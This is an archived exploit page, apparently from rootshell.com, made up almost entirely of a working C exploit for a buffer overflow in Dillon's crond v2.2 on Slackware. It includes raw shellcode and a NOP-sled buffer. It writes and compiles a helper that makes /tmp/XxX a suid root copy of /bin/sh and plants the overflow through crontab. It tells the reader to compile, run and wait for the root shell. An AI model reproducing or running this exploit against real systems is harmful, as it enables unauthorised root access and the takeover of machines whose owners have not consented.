Return to index
|
Download NON-HTML Version
|
Add Comment
|
View Comments (1 comment(s))
/* [ http://www.rootshell.com/ ] */ /* Dillon's Crond v2.2 exploit */ /* */ /* There exists a buffer overflow */ /* in Slackware's /usr/sbin/crond */ /* in the fdprintf() function from */ /* subs.c [specifically vsprintf()] */ /* Also take note that the overflow */ /* was discovered by the KSRT team. */ /* */ /* However, to exploit this, crond */ /* must be invoked without the -l */ /* option. By default, it is invoked */ /* with the -l option from the */ /* /etc/rc.d/rc.M script -> */ /* */ /* /usr/sbin/crond -l10 */ /* */ /* Therefore, by default this exploit */ /* will not work. However, if crond */ /* is running without the -l option, */ /* then root can be obtained. */ /* */ /* Simply compile and run this. */ /* and look for a suid root shell */ /* in /tmp (/tmp/XxX) in about one */ /* minute. This exploit also seems to */ /* cause crond to segfault if X is */ /* runninga .Please use this in */ /* a responsible manner. */ #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> #include <pwd.h> #define DEFAULT_OFFSET 560 #define DEFAULT_BUFFER_SIZE 980 #define TOTAL_BUFFER 4096 char shellcode[]= "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07" "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12" "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8" "\xd7\xff\xff\xff/tmp/xo"; long get_esp(void) { __asm__("movl %esp,%eax"); } void calc_bs(int *bs_ptr) { int len=0; struct passwd *p_name; /* dependant on length of username */ p_name=getpwuid(getuid()); len=strlen(p_name->pw_name); *bs_ptr = 986 - len; return; } int main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; int i, ofs=DEFAULT_OFFSET; int bs=DEFAULT_BUFFER_SIZE; FILE *fp=NULL; /* probably will not need to give argument */ if (argc==2) ofs=atoi(argv[1]); calc_bs(&bs); buff=malloc(TOTAL_BUFFER); if(!buff) { perror("malloc"); exit(EXIT_FAILURE); } ptr=buff; memset(ptr,0x90, bs-strlen(shellcode)); ptr += bs-strlen(shellcode); for (i=0; i<strlen(shellcode); i++) *(ptr++) = shellcode[i]; addr_ptr = (long *)ptr; for (i=0; i<2; i++) *(addr_ptr++)=get_esp()-ofs; ptr=(char *)addr_ptr; *ptr=0; /* create binary in /tmp to make suid shell */ fp=fopen("/tmp/xo.c","w+"); if (!fp) { fprintf(stderr,"Can't open /tmp/xo.c for writing!"); exit(EXIT_FAILURE); } fprintf(fp,"#include <stdio.h>\n"); fprintf(fp,"#include <stdlib.h>\n"); fprintf(fp,"main() {\n"); fprintf(fp,"\tsystem(\"/bin/cp /bin/sh /tmp/XxX\");\n"); fprintf(fp,"\tsystem(\"chown root /tmp/XxX\");\n"); fprintf(fp,"\tsystem(\"chmod 4755 /tmp/XxX\");\n"); fprintf(fp,"}\n"); fclose(fp); /* compile our program to create suid shell */ system("cc -o /tmp/xo /tmp/xo.c"); unlink("/tmp/xo.c"); /* now use crontab to plant overflow for crond */ fp=fopen("r00t","w+"); if (!fp) { perror("fopen"); exit(EXIT_FAILURE); } fprintf(fp,"%s\n",buff); fclose(fp); /* put our r00t crontab in crontabs directory */ system("/usr/bin/crontab r00t"); unlink("r00t"); /* helpful reminder */ printf("Now wait about 1 minute and look\n"); printf("for the suid shell -> /tmp/XxX\n"); exit(0); }